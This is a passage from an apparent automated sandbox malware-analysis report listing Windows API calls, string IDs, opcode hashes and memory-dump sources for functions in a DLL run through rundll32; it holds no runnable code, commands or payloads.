                                                                                                                      • Opcode ID: d6930e6a1fc45b4748102b9b6de5cc36bf5b45ad8e48198316e22918239c4344
                                                                                                                      • Instruction ID: 5c8f7e15fc6d9e06ebf4fa262ac9747ef485c43692dc612ad86c8b01a400670e
                                                                                                                      • Opcode Fuzzy Hash: d6930e6a1fc45b4748102b9b6de5cc36bf5b45ad8e48198316e22918239c4344
                                                                                                                      • Instruction Fuzzy Hash: B6317374A85218DBE724DB90CD56FD9B3B1EF49300F1041E8E509AA2C1DB72E9D18F55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                      • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                      • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                      • __lock.LIBCMT ref: 10035229
                                                                                                                      • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                      • API String ID: 1036688887-2843748187
                                                                                                                      • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                      • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                      • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                      • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                      • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                      • String ID: MS Shell Dlg
                                                                                                                      • API String ID: 1736106359-76309092
                                                                                                                      • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                      • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                      • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                      • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                      • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 46613423-3470857405
                                                                                                                      • Opcode ID: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction ID: 42bba0fd7f26ad83684da700c29fa1b9b4104b8155991441c2ce65153df76cb7
                                                                                                                      • Opcode Fuzzy Hash: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction Fuzzy Hash: A5119175640268EBEB10DBA0DE85FEF77B8EF1A781F800025FA05E6181EB709D05CB65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                      • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1891723912-0
                                                                                                                      • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                      • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                        • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                        • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                      • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 317715441-0
                                                                                                                      • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                      • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                      • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                        • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                        • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                        • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 168474834-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                      • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1151147025-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                      • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2841959276-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                      • _memset.LIBCMT ref: 10029DA5
                                                                                                                        • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                        • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                        • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2905758408-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3574576181-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                      • String ID: Software\
                                                                                                                      • API String ID: 3878845136-964853688
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 1001AC38
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                      • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                      • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                      • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                      • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2853195852-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3219385341-0
                                                                                                                      • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                      • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                      • GetParent.USER32(?), ref: 1002A22C
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                      • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                      • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$LongParentVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 506644340-0
                                                                                                                      • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                      • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                      • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                      • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                      • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                      • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                        • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                      • String ID: V&'
                                                                                                                      • API String ID: 1067611704-802299783
                                                                                                                      • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                      • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                        • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2004563703-0
                                                                                                                      • Opcode ID: bbfc80b82c06ce06fa3432dd8c84df72dbde6e28130cc3a92eea8503f98b2c83
                                                                                                                      • Instruction ID: 36031bf0d5d502a9a7c8cde16f4ed6c3aebd0fb21a6c22909054b64381bbc268
                                                                                                                      • Opcode Fuzzy Hash: bbfc80b82c06ce06fa3432dd8c84df72dbde6e28130cc3a92eea8503f98b2c83
                                                                                                                      • Instruction Fuzzy Hash: 35216DB4D04299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00C765
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreate$Open
                                                                                                                      • String ID: software
                                                                                                                      • API String ID: 1740278721-2010147023
                                                                                                                      • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                      • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                        • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                        • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                        • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                        • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task_impl$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1204490572-0
                                                                                                                      • Opcode ID: 703939aafb2aac54e1cd52b349934920119c94dd7a627e6a4c3e8e8e6c663feb
                                                                                                                      • Instruction ID: d8da987412a92661894f53f4219df58ee2caf7a71088449fd518a1fce9205d0f
                                                                                                                      • Opcode Fuzzy Hash: 703939aafb2aac54e1cd52b349934920119c94dd7a627e6a4c3e8e8e6c663feb
                                                                                                                      • Instruction Fuzzy Hash: 67214770905189DBEB09DB98C960BAEBB75EF01308F18469DE0526B3C2CB392B10C716
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                        • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                        • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
